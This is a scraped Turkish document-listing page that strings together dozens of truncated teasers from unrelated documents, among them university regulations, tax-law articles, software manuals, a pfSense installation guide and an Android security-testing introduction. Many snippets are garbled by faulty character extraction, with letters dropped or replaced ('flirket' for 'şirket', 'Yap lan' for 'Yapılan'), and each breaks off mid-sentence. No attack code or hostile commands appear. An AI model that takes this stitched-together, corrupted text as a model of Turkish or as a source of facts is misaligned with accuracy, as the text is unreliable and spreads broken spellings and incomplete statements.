MikroÖdeme Servis Dökümanı MikroÖdeme Servis Dökümanı 1 TurkcellMobilÖdeme Nedir? TurkcellMobilÖdeme 36 milyonu aşkın Turkcell kullanıcısının cep telefonlarını kullanarak, sadece bir SMS ile, pratik bir şekilde ödeme yapmasına olanak

Detaylı

EVOK Güvenlik in hedefi daima bu kalite ve standartlarda hizmet sunmakt r. Hasan ERDEM R. Mustafa AL KOÇ. Yönetim Kurulu Baflkan.

EVOK Güvenlik in hedefi daima bu kalite ve standartlarda hizmet sunmakt r. Hasan ERDEM R. Mustafa AL KOÇ. Yönetim Kurulu Baflkan. EVOK Güvenlik, ülkemizde büyük ihtiyaç duyulan güvenlik hizmetlerine kalite getirmek amac yla Mustafa Alikoç yönetiminde profesyonel bir ekip taraf ndan kurulmufltur. Güvenlik sektöründeki 10 y ll k bilgi,

Detaylı

AĞ ÜZERİNDEN YAZICI ve TARAYICI TANIMLAMA KLAVUZU

AĞ ÜZERİNDEN YAZICI ve TARAYICI TANIMLAMA KLAVUZU AĞ ÜZERİNDEN YAZICI ve TARAYICI TANIMLAMA KLAVUZU A-) DİKKAT EDİLECEK HUSUSLAR: 1-) Cihazınızın panelinden Sistem Yöneticisi menüsünden ağ ayarlarınızın yapılandırılmış olması gerekmektedir. Kurulumu yapan

Detaylı

Analiz aşaması sıralayıcı olurusa proje yapımında daha kolay ilerlemek mümkün olacaktır.

Analiz aşaması sıralayıcı olurusa proje yapımında daha kolay ilerlemek mümkün olacaktır. Analiz Raporu Kısa Özet Her geçen gün eczanecilik sektörü kendi içerisinde daha da yarışır hale geliyor. Teknolojinin getirdiği kolaylık ile eczane otomasyonu artık elinizin altında. Çoğu eczacılar hastalarına

Detaylı

30 > 35. nsan Kaynaklar. > nsan Kaynaklar Yönetimi > Personel E itimleri > Personel Otomasyonu

30 > 35. nsan Kaynaklar. > nsan Kaynaklar Yönetimi > Personel E itimleri > Personel Otomasyonu 30 > 35 nsan Kaynaklar > nsan Kaynaklar Yönetimi > Personel E itimleri > Personel Otomasyonu > nsan Kaynaklar Personele Göre fl De il, fle Göre Personel. stanbul Büyükflehir Belediyesi, Personele Göre

Detaylı

ÖĞRENME FAALĠYETĠ 7. 7. GELĠġMĠġ ÖZELLĠKLER

ÖĞRENME FAALĠYETĠ 7. 7. GELĠġMĠġ ÖZELLĠKLER ÖĞRENME FAALĠYETĠ 7 AMAÇ ÖĞRENME FAALĠYETĠ 7 Bu faaliyette verilen bilgiler ile hazırlamıģ olduğunuz belgeye uygun baģvuruları (Ġçindekiler Tablosu, Dipnot/sonnot, Ģekil tablosu, resim yazısı vb.) hatasız

Detaylı

Hukuk için Biliflim, Biliflim için Hukuk... Kurultay : 1-A ve 1-B No lu Salonlar Sergi (Stant) : 2 No lu Salon zmir Uluslararas Fuar Alan - Kültürpark Ülkemizin bilgi otoyollar ile sar ld günümüzde, bilgiyi

Detaylı

SİİRT ÜNİVERSİTESİ UZAKTAN EĞİTİM UYGULAMA VE ARAŞTIRMA MERKEZİ YÖNETMELİĞİ BİRİNCİ BÖLÜM. Amaç, Kapsam, Dayanak ve Tanımlar. Amaç

SİİRT ÜNİVERSİTESİ UZAKTAN EĞİTİM UYGULAMA VE ARAŞTIRMA MERKEZİ YÖNETMELİĞİ BİRİNCİ BÖLÜM. Amaç, Kapsam, Dayanak ve Tanımlar. Amaç SİİRT ÜNİVERSİTESİ UZAKTAN EĞİTİM UYGULAMA VE ARAŞTIRMA MERKEZİ YÖNETMELİĞİ BİRİNCİ BÖLÜM Amaç, Kapsam, Dayanak ve Tanımlar Amaç MADDE 1 (1) Bu Yönetmeliğin amacı; Siirt Üniversitesi Uzaktan Eğitim Uygulama

Detaylı

www.mercedes-benz.com.tr Mercedes-Benz Orijinal Ya lar

www.mercedes-benz.com.tr Mercedes-Benz Orijinal Ya lar www.mercedes-benz.com.tr Mercedes-Benz Orijinal Ya lar Kazand ran Güç Mercedes-Benz orijinal ya lar arac n z üreten uzmanlar taraf ndan, gelifltirilmifltir. Mercedes-Benz in dilinden en iyi Mercedes-Benz

Detaylı

Autodesk Building Design Suite 2012. Sorular ve Cevapları

Autodesk Building Design Suite 2012. Sorular ve Cevapları Autodesk Building Design Suite 2012 Sorular ve Cevapları Autodesk Building Design Suite 2012 yazılımı, daha etkin tasarım yapmanıza ve iletişim kurmanıza yardım eder. Ödediğiniz fiyat karşılığında mükemmel

Detaylı

Güvenli İnternet Teknolojileri. Kurumsal Şirket Tanıtımı

Güvenli İnternet Teknolojileri. Kurumsal Şirket Tanıtımı Güvenli İnternet Teknolojileri Kurumsal Şirket Tanıtımı - Hakkımızda - Vizyon & Misyon - Tarihçe INDEX - Faaliyetlerimiz - Marka - Hizmetlerimiz - Sistem Destek ve Uzmanlıklarımız - Kurumsal Danışmanlıklarımız

Detaylı

ATAÇ Bilgilendirme Politikası

ATAÇ Bilgilendirme Politikası ATAÇ Bilgilendirme Politikası Amaç Bilgilendirme politikasının temel amacı, grubun genel stratejileri çerçevesinde, ATAÇ İnş. ve San. A.Ş. nin, hak ve yararlarını da gözeterek, ticari sır niteliğindeki

Detaylı

Hart Walker, gövde deste i ve dengeli tekerlek sistemi sayesinde, geliflim düzeyi uygun olan çocuklar n, eller serbest flekilde yürümesini sa lar.

Hart Walker, gövde deste i ve dengeli tekerlek sistemi sayesinde, geliflim düzeyi uygun olan çocuklar n, eller serbest flekilde yürümesini sa lar. Cerebral palsi gibi hareket ve postüral kontrol bozukluklar na yol açan hastal klar olan çocuklar, hastal klar n n derecesine ba l olarak yürüme güçlü ü çekmekte veya hiç yürüyememektedir. Hart Walker,

Detaylı

VER TABANI VE STANDART DOSYA PLANI KURULUM KLAVUZU 23.04.2011

VER TABANI VE STANDART DOSYA PLANI KURULUM KLAVUZU 23.04.2011 VER TABANI VE STANDART DOSYA PLANI KURULUM KLAVUZU Saydam Yaz m 23.04.2011 www.saydamyazilim.com Tel : 0232 369 54 64 66 Fax : 0232 369 71 69 Sayfa 1 Birinci bölümde s r kurulum yap lmas için öncelikle

Detaylı

YÖKAKADEMİK (Yükseköğretim Akademik Arama Sistemi)

YÖKAKADEMİK (Yükseköğretim Akademik Arama Sistemi) YÖKAKADEMİK (Yükseköğretim Akademik Arama Sistemi) YÖKAKADEMİK (Yükseköğretim Akademik Arama), Türk yükseköğretiminde görev yapan akademisyenlere ait kişisel akademik bilgilerin ve bilimsel / akademik

Detaylı

Pfsense kurulum için gereken cd iso imajını http://www.pfsense.org/mirror.php?section=downloads adresinden indirebilirsiniz.

Pfsense kurulum için gereken cd iso imajını http://www.pfsense.org/mirror.php?section=downloads adresinden indirebilirsiniz. Pfsense Kurulum ve ilk Ayarlar Sistem güvenliği ve kullanıcıların kontrol altında tutulması için piyasada bir çok firewall ve benzeri gerek donanımsal gerekse yazılımsal olarak bir çok ürün bulunmaktadır.

Detaylı

MUŞ ALPARSLAN ÜNİVERSİTESİ UZAKTAN EĞİTİM UYGULAMA VE ARAŞTIRMA MERKEZİ YÖNETMELİĞİ

MUŞ ALPARSLAN ÜNİVERSİTESİ UZAKTAN EĞİTİM UYGULAMA VE ARAŞTIRMA MERKEZİ YÖNETMELİĞİ MUŞ ALPARSLAN ÜNİVERSİTESİ UZAKTAN EĞİTİM UYGULAMA VE ARAŞTIRMA MERKEZİ YÖNETMELİĞİ BİRİNCİ BÖLÜM Amaç, Kapsam, Dayanak ve Tanımlar Amaç MADDE 1 (1) Bu Yönetmeliğin amacı; Muş Alparslan Üniversitesi Uzaktan

Detaylı

PROJE TEKLİF FORMU. Haydi birlikte harika bir iş çıkartalım.

PROJE TEKLİF FORMU. Haydi birlikte harika bir iş çıkartalım. Projeniz için atezer i seçtiğiniz için teşekkür ederiz. Lütfen bu formun içerisinde projenizle ilgili olan kısımları doldurun, bu projenizi daha iyi anlamamıza yardımcı olacaktır. İyi sonuçlar elde etmek

Detaylı

MOTORLU TAfiIT SÜRÜCÜLER KURSLARINDA KATMA DE ER VERG S N DO URAN OLAY

MOTORLU TAfiIT SÜRÜCÜLER KURSLARINDA KATMA DE ER VERG S N DO URAN OLAY MOTORLU TAfiIT SÜRÜCÜLER KURSLARINDA KATMA DE ER VERG S N DO URAN OLAY brahim ERCAN * 1- GENEL B LG : Motorlu tafl t sürücüleri kurslar, 5580 say l Özel Ö retim Kurumlar Kanunu kapsam nda motorlu tafl

Detaylı

TMS 19 ÇALIfiANLARA SA LANAN FAYDALAR. Yrd. Doç. Dr. Volkan DEM R Galatasaray Üniversitesi Muhasebe-Finansman Anabilim Dal Ö retim Üyesi

TMS 19 ÇALIfiANLARA SA LANAN FAYDALAR. Yrd. Doç. Dr. Volkan DEM R Galatasaray Üniversitesi Muhasebe-Finansman Anabilim Dal Ö retim Üyesi 1 2. B Ö L Ü M TMS 19 ÇALIfiANLARA SA LANAN FAYDALAR Yrd. Doç. Dr. Volkan DEM R Galatasaray Üniversitesi Muhasebe-Finansman Anabilim Dal Ö retim Üyesi 199 12. Bölüm, TMS-19 Çal flanlara Sa lanan Faydalar

Detaylı

Aile flirketleri, kararlar nda daha subjektif

Aile flirketleri, kararlar nda daha subjektif Dr. Yeflim Toduk Akifl Aile flirketleri, kararlar nda daha subjektif flirket birleflmeleri ve sat nalmalar, türkiye deki küçük iflletmelerden, dev flirketlere kadar her birinin gündeminde olmaya devam

Detaylı

5.2 CEPHE PANEL 5.2.1 K YÜZÜ METAL M NERAL YÜN YALITIMLI SANDV Ç PANEL. 5.2.1.1 DÜfiEY CEPHE PANEL UYGULAMASI

5.2 CEPHE PANEL 5.2.1 K YÜZÜ METAL M NERAL YÜN YALITIMLI SANDV Ç PANEL. 5.2.1.1 DÜfiEY CEPHE PANEL UYGULAMASI 5.2 CEPHE PANEL Resim 5.16 Mineral yün cephe paneli 5.2.1 K YÜZÜ METAL M NERAL YÜN YALITIMLI SANDV Ç PANEL Is, su, ses yal t m ve yang n güvenli i özelliklerini bünyesinde bar nd ran mineral yün yal t

Detaylı

Xerox ConnectKey Teknolojisine sahip Çok Fonksiyonlu Yazıcılarla (MFP'ler) Kullanım İçin

Xerox ConnectKey Teknolojisine sahip Çok Fonksiyonlu Yazıcılarla (MFP'ler) Kullanım İçin Xerox App Gallery Uygulaması Hızlı Başlangıç Kılavuzu 702P03997 Xerox ConnectKey Teknolojisine sahip Çok Fonksiyonlu Yazıcılarla (MFP'ler) Kullanım İçin Xerox App Gallery Uygulamasını, ConnectKey özelliğine

Detaylı

Anonim Verilerin Lenovo ile Paylaşılması. İçindekiler. Harmony

Anonim Verilerin Lenovo ile Paylaşılması. İçindekiler. Harmony Anonim Verilerin Lenovo ile Paylaşılması İçindekiler Anonim Verilerin Lenovo ile Paylaşılması... 1 Harmony... 1 Lenovo Companion 3.0... 2 Lenovo Customer Engagement Service... 3 Lenovo Experience Improvement

Detaylı

İNTEGRAL MENKUL DEĞERLER A.Ş. BİLGİLENDİRME POLİTİKASI

İNTEGRAL MENKUL DEĞERLER A.Ş. BİLGİLENDİRME POLİTİKASI İNTEGRAL MENKUL DEĞERLER A.Ş. BİLGİLENDİRME Doküman No : INM_PR_40 Yayın Tarihi : 30/03/2016 Revizyon Tarihi ve Sayısı : - Sayfa 1 BİLGİLENDİRME 1. Amaç Bilgilendirme Politikası nın temel amacı; ticari

Detaylı

Android Uygulamalarında Güvenlik Testi

Android Uygulamalarında Güvenlik Testi Android Uygulamalarında Güvenlik Testi Şubat ayında Gartner tarafından yayımlanan bir rapora göre dünya genelinde 2011 yılının 4. çeyreğinde satılan akıllı telefonların %50.9 unda Android işletim sisteminin,

Detaylı

DOKÜMAN YÖNETİM SİSTEMİ KULLANIMI GELEN EVRAK

DOKÜMAN YÖNETİM SİSTEMİ KULLANIMI GELEN EVRAK DOKÜMAN YÖNETİM SİSTEMİ KULLANIMI GELEN EVRAK 1. DYS (Doküman Yönetim Sistemi) nin kullanımı için 3. parti bir programa ihtiyaç yoktur. Tamamen WEB tabanlı çalışmaktadır. 2. Sisteme http://dys.akdeniz.edu.tr

Detaylı

AÇIKLAMALAR VE UYGULAMALAR

AÇIKLAMALAR VE UYGULAMALAR SEÇ LM fi TÜRK YE F NANSAL RAPORLAMA STANDARTLARI AÇIKLAMALAR VE UYGULAMALAR Prof. Dr. Cemal B fi (Marmara Üniversitesi) Doç. Dr. Yakup SELV ( stanbul Üniversitesi) Doç. Dr. Fatih YILMAZ ( stanbul Üniversitesi)

Detaylı

X. BÖLÜM AYDINLATMA OTOMASYON S STEM

X. BÖLÜM AYDINLATMA OTOMASYON S STEM X. BÖLÜM AYDINLATMA OTOMASYON S STEM 10.1. AYDINLATMA YÖNET M Yap lan araflt rmalar, bir otomasyon sisteminin tam anlam ile uygulanmas ve teknik elemanlar n programl bak mlarda ald önlemler sonucunda y

Detaylı

Windows VISTA Ultimate Kurulumu ve Yönetimi

Windows VISTA Ultimate Kurulumu ve Yönetimi Windows VISTA Ultimate Kurulumu ve Yönetimi Windows Vista Ultimate, Vista'nın tüm özelliklerini içinde barındırıyor ve en pahalısürüm olarak listede yerini alıyor. SİSTEM GEREKSİNİMLERİ 1 GHz 32-bit işlemci

Detaylı

Enerji Tasarrufunda İnovatif Çözümler

Enerji Tasarrufunda İnovatif Çözümler Isı Yalıtımı Enerji Tasarrufunda İnovatif Çözümler Terma Enerji Verimliliği nin temel politikası, en yeni teknolojileri, kaliteli hizmet anlayışıyla bir araya getirerek enerji verimliliği uygulamalarını

Detaylı

1. Yapılan ayarları kontrol etmek 2. Hataların doğru anlaşıldığından emin olmak 3. Donanıma uygun işletim sistemini belirlemek İŞLEM ANALİZ FORMU

1. Yapılan ayarları kontrol etmek 2. Hataların doğru anlaşıldığından emin olmak 3. Donanıma uygun işletim sistemini belirlemek İŞLEM ANALİZ FORMU MESLEĞİN ADI Bilişim Teknolojileri İŞLEMİN ADI Bilgisayarın ilk açılış ayarlarını İŞLEM NUMARASI 2.1 İşletim sisteminin kurulumunu Montajı tamamlanmış bilgisayar, klavye, fare, monitör Sistemin ilk açılış

Detaylı

BYazan: SEMA ERDO AN. ABD ve Avrupa Standartlar nda Fact-Jacie Akreditasyon Belgesi. Baflkent Üniversitesi nden Bir lk Daha

BYazan: SEMA ERDO AN. ABD ve Avrupa Standartlar nda Fact-Jacie Akreditasyon Belgesi. Baflkent Üniversitesi nden Bir lk Daha Baflkent Üniversitesi nden Bir lk Daha ABD ve Avrupa Standartlar nda Fact-Jacie Akreditasyon Belgesi Baflkent Üniversitesi T p Fakültesi Adana Eriflkin Kemik li i Nakil ve Hücresel Tedavi Merkezi, Türkiye

Detaylı

BELGES Z MAL BULUNDURULMASI VEYA H ZMET SATIN ALINMASI NEDEN YLE KDV SORUMLULU U

BELGES Z MAL BULUNDURULMASI VEYA H ZMET SATIN ALINMASI NEDEN YLE KDV SORUMLULU U BELGES Z MAL BULUNDURULMASI VEYA H ZMET SATIN ALINMASI NEDEN YLE KDV SORUMLULU U Cengiz SAZAK* 1.G R fi Bilindi i üzere Katma De er Vergisi harcamalar üzerinden al n r ve nihai yüklenicisi, (di er bir

Detaylı

Resmi Gazete Tarihi: 12.09.2010 Resmî Gazete Resmi Gazete Sayısı: 27697 YÖNETMELİK ELEKTRONİK HABERLEŞME SEKTÖRÜNDE HİZMET KALİTESİ YÖNETMELİĞİ

Resmi Gazete Tarihi: 12.09.2010 Resmî Gazete Resmi Gazete Sayısı: 27697 YÖNETMELİK ELEKTRONİK HABERLEŞME SEKTÖRÜNDE HİZMET KALİTESİ YÖNETMELİĞİ Resmi Gazete Tarihi: 12.09.2010 Resmî Gazete Resmi Gazete Sayısı: 27697 YÖNETMELİK Bilgi Teknolojileri ve İletişim Kurumundan: ELEKTRONİK HABERLEŞME SEKTÖRÜNDE HİZMET KALİTESİ YÖNETMELİĞİ BİRİNCİ BÖLÜM

Detaylı

PROMOSYON VE EfiANT YON ÜRÜNLER N GEL R VE KURUMLAR VERG S LE KATMA DE ER VERG S KANUNLARI KARfiISINDAK DURUMU

PROMOSYON VE EfiANT YON ÜRÜNLER N GEL R VE KURUMLAR VERG S LE KATMA DE ER VERG S KANUNLARI KARfiISINDAK DURUMU PROMOSYON VE EfiANT YON ÜRÜNLER N GEL R VE KURUMLAR VERG S LE KATMA DE ER VERG S KANUNLARI KARfiISINDAK DURUMU Aytaç ACARDA * I G R fi flletmeler belli dönemlerde sat fllar n artt rmak ve iflletmelerini

Detaylı

İşletim Sisteminin Katmanları

İşletim Sisteminin Katmanları İşletim Sistemi Bilgisayar donanımının doğrudan denetimi ve yönetiminden, temel sistem işlemlerinden ve uygulama yazılımlarını çalıştırmaktan sorumlu olan sistem yazılımıdır. Bütün diğer yazılımların belleğe,

Detaylı

USB KVM Switch. Ses özellikli ve 2 portlu USB KVM switch. Ses özellikli ve 4 portlu USB KVM switch

USB KVM Switch. Ses özellikli ve 2 portlu USB KVM switch. Ses özellikli ve 4 portlu USB KVM switch USB KVM Switch Ses özellikli ve 2 portlu USB KVM switch Ses özellikli ve 4 portlu USB KVM switch Kullanma Kılavuzu DS-11403 (2 Portlu) DS-12402 (4 Portlu) 1 NOT Bu cihaz FCC kurallarının 15. Bölümü uyarınca,

Detaylı

Genel bilgiler Windows gezgini Kes Kopyala Yapıştır komutları. 4 Bilinen Dosya Uzantıları

Genel bilgiler Windows gezgini Kes Kopyala Yapıştır komutları. 4 Bilinen Dosya Uzantıları İÇERİK 2 Dosya ve Klasör İşlemleri 3 Giriş BİLGİ TEKNOLOJİLERİ VE UYGULAMALARI Windows 7 - Devam ÖĞR. GÖR. HASAN ALİ AKYÜREK http://www.hasanakyurek.com Sürümler Sürüm Karşılaştırmaları Masaüstü Görev

Detaylı

YÜKSEKÖĞRETİM KURUMLARI ENGELLİLER DANIŞMA VE KOORDİNASYON YÖNETMELİĞİ (1) BİRİNCİ BÖLÜM. Amaç, Kapsam, Dayanak ve Tanımlar

YÜKSEKÖĞRETİM KURUMLARI ENGELLİLER DANIŞMA VE KOORDİNASYON YÖNETMELİĞİ (1) BİRİNCİ BÖLÜM. Amaç, Kapsam, Dayanak ve Tanımlar YÜKSEKÖĞRETİM KURUMLARI ENGELLİLER DANIŞMA VE KOORDİNASYON YÖNETMELİĞİ (1) BİRİNCİ BÖLÜM Amaç, Kapsam, Dayanak ve Tanımlar Amaç MADDE 1 (Değişik:RG-14/2/2014-28913) (1) Bu Yönetmeliğin amacı; yükseköğrenim

Detaylı

Yıllarca bu konuda çalışan görüntü işleme uzmanlarının önerisi. Artık ArcGIS ile entegre

Yıllarca bu konuda çalışan görüntü işleme uzmanlarının önerisi. Artık ArcGIS ile entegre ENVI EX CBS kullanıcıları için görüntü işleme yazılımı Yıllarca bu konuda çalışan görüntü işleme uzmanlarının önerisi Artık ArcGIS ile entegre Uydu veya hava sensörlerine ait görüntülerin artalan verisi

Detaylı

Araflt rma modelinin oluflturulmas. Veri toplama

Araflt rma modelinin oluflturulmas. Veri toplama 21 G R fi Araflt rman n amac na ba l olarak araflt rmac ayr ayr nicel veya nitel yöntemi kullanabilece i gibi her iki yöntemi bir arada kullanarak da araflt rmas n planlar. Her iki yöntemin planlama aflamas

Detaylı

Genel Yay n S ra No: 178 2010/20. Yay na Haz rlayan: Av. Celal Ülgen / Av. Coflkun Ongun

Genel Yay n S ra No: 178 2010/20. Yay na Haz rlayan: Av. Celal Ülgen / Av. Coflkun Ongun Genel Yay n S ra No: 178 2010/20 ISBN No: 978-605-5614-56-0 Yay na Haz rlayan: Av. Celal Ülgen / Av. Coflkun Ongun Tasar m / Uygulama Referans Medya ve Reklam Hiz. Ltd. Tel: +90.212 347 32 47 e-mail: info@referansajans.com

Detaylı

Ak ld fl AMA Öngörülebilir

Ak ld fl AMA Öngörülebilir Ak ld fl AMA Öngörülebilir Ak ld fl AMA Öngörülebilir Kararlar m z Biçimlendiren Gizli Kuvvetler Dan Ariely Çevirenler Asiye Hekimo lu Gül Filiz fiar ISBN 978-605-5655-39-6 2008, Dan Ariely Orijinal ad

Detaylı

BQTEK SMS Asistan. Kullanım Kılavuzu. Doküman Versiyon: 1.0 09.05.2016 BQTEK

BQTEK SMS Asistan. Kullanım Kılavuzu. Doküman Versiyon: 1.0 09.05.2016 BQTEK Kullanım Kılavuzu Doküman Versiyon: 1.0 09.05.2016 BQTEK İçindekiler İçindekiler... 2 Genel Bilgi... 3 Uygulamanın İndirilmesi... 3 iphone için... 3 Android için... 3 Windows ve Mac için... 3 Uygulamanın

Detaylı

Gmail Outlook Ayarları (Türkçe Resimli Anlatım)

Gmail Outlook Ayarları (Türkçe Resimli Anlatım) Gmail Outlook Ayarları (Türkçe Resimli Anlatım) 1.Adım: Gmail üzerinden e-posta hesabınıza herhangi bir tarayıcıdan http://mail.maltepe.edu.tr linkine tıklayıp daha önceden kullandığınız e-posta hesabınızı

Detaylı

Gürcan Banger Enerji Forumu 10 Mart 2007

Gürcan Banger Enerji Forumu 10 Mart 2007 Enerji ve Kalkınma Gürcan Banger Enerji Forumu 10 Mart 2007 Kırılma Noktası Dünyanın gerçeklerini kırılma noktalarında daha iyi kavrıyoruz. Peşpeşe gelen, birbirine benzer damlaların bir tanesi bardağın

Detaylı

Ders 11: PROJEN N R SKLER /VARSAYIMLARI

Ders 11: PROJEN N R SKLER /VARSAYIMLARI Risk nedir? Ders 11: PROJEN N R SKLER /VARSAYIMLARI Projeler, proje yöneticilerinin do rudan kontrol edemeyecekleri olaylardan etkilenebilirler. Proje gerçek durumun bütün boyutlar n kapsayamaz. D fl faktörler,

Detaylı

performansi_olcmek 8/25/10 4:36 PM Page 1 Performans Ölçmek

performansi_olcmek 8/25/10 4:36 PM Page 1 Performans Ölçmek Performans Ölçmek Cep Yönderi Dizisi Cep Yönderi Dizisi yöneticilerin ifl yaflam nda her gün karfl laflt klar en yayg n meydan okumalara ivedi çözümler öneriyor. Dizi içinde yer alan her kitapta, güçlü

Detaylı

KİMLİK DOĞRULAMA AUTHENTİCATİON

KİMLİK DOĞRULAMA AUTHENTİCATİON KİMLİK DOĞRULAMA AUTHENTİCATİON Kimlik Doğrulama (Authentication), çok çeşitli yöntemlerle gerçekleştirilmesi mümkün bir süreçtir ve bu süreç, doğrulama ihtiyacına ve kendisini tanıtacak taraf ile bunu

Detaylı

Yrd. Doç. Dr. Olcay Bige AŞKUN. İşletme Yönetimi Öğretim ve Eğitiminde Örnek Olaylar ile Yazınsal Kurguları

Yrd. Doç. Dr. Olcay Bige AŞKUN. İşletme Yönetimi Öğretim ve Eğitiminde Örnek Olaylar ile Yazınsal Kurguları I Yrd. Doç. Dr. Olcay Bige AŞKUN İşletme Yönetimi Öğretim ve Eğitiminde Örnek Olaylar ile Yazınsal Kurguları II Yay n No : 2056 Hukuk Dizisi : 289 1. Bas Kas m 2008 - STANBUL ISBN 978-975 - 295-953 - 8

Detaylı

İşaret Aygıtları ve Klavye Kullanıcı Kılavuzu

İşaret Aygıtları ve Klavye Kullanıcı Kılavuzu İşaret Aygıtları ve Klavye Kullanıcı Kılavuzu Copyright 2007 Hewlett-Packard Development Company, L.P. Microsoft ve Windows, Microsoft Corporation şirketinin tescilli ticari markalarıdır. Bu belgede yer

Detaylı

İşletme Gelişimi Atölye Soruları

İşletme Gelişimi Atölye Soruları İşletme Gelişimi Atölye Soruları Şemsettin Akçay Satış Pazarlama ve İnovasyon Mühendisi İşletmenizi Başarıya Götüren 50 Soru! Bir gün küçük kızımız Lara (o zaman 3.5 yaşındaydı): Baba deniz gölgesi nedir,

Detaylı

G R fi 1 Adobe AIR E BAfiLANGIÇ

G R fi 1 Adobe AIR E BAfiLANGIÇ +ADOBE AIR-icindekiler 5/10/09 10:25 PM Page ix Ç NDEK LER G R fi 1 Kitab Kimler Okumal? 1 Bize Çekinmeden Yaz n 2 Kitaptaki Örneklerin Kullan m 3 DVD çerisindeki Örnekler 5 Flex Builder ile Arfliv Dosyalar

Detaylı

ELEKTRONĐK TĐCARETĐN DÜZENLENMESĐ KANUNU 1 MAYIS 2015 TE YÜRÜRLÜĞE GĐRDĐ

ELEKTRONĐK TĐCARETĐN DÜZENLENMESĐ KANUNU 1 MAYIS 2015 TE YÜRÜRLÜĞE GĐRDĐ 30.04.2015 ELEKTRONĐK TĐCARETĐN DÜZENLENMESĐ KANUNU 1 MAYIS 2015 TE YÜRÜRLÜĞE GĐRDĐ 20 SORUDA YENĐ KANUN: 1. Kanun ne zaman yürürlüğe girmektedir? 23 Ekim 2014 tarihinde Resmi Gazete de yayımlanan Kanun;

Detaylı

Başbakanlık Mevzuatı Geliştirme ve Yayın Genel Müdürlüğü 07.03.2012 06:18

Başbakanlık Mevzuatı Geliştirme ve Yayın Genel Müdürlüğü 07.03.2012 06:18 http://www.resmigazete.gov.tr/eskiler/2012/03/201203... 1 of 5 6 Mart 2012 SALI Resmî Gazete Sayı : 28225 Atatürk Üniversitesinden: YÖNETMELİK ATATÜRK ÜNİVERSİTESİ ASTROFİZİK UYGULAMA VE ARAŞTIRMA MERKEZİ

Detaylı